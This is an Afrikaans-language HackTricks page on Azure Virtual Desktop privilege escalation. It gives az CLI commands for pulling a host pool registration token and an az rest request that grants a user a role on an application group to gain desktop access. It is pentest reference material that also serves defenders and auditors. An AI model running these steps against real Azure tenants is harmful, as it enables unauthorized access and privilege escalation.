# Az - Virtuele Desktop Privesc

{{#include ../../../banners/hacktricks-training.md}}

## Azure Virtuele Desktop Privesc

Vir meer inligting oor Azure Virtuele Desktop, kyk:

{{#ref}}
../az-services/az-virtual-desktop.md
{{#endref}}

### `Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action`
Jy kan die registrasietoken wat gebruik word om virtuele masjiene binne 'n gasheerpoel te registreer, verkry.
```bash
az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
```
### Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write

> [!WARNING]
> 'n Aanvaller met hierdie toestemmings kan dinge doen wat baie gevaarliker is as hierdie een.

Met hierdie toestemmings kan jy 'n gebruikersopdrag aan die Toepassing-groep voeg, wat nodig is om toegang te verkry tot die virtuele masjien van die virtuele desktop:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
--body '{
"properties": {
"roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
"principalId": "<USER_OBJECT_ID>"
}
}'
```
Let wel dat 'n gebruiker die toegang tot 'n Desktop of 'n toepassing wil hê, ook die rol `Virtual Machine User Login` of `Virtual Machine Administrator Login` oor die VM nodig het. 

{{#include ../../../banners/hacktricks-training.md}}
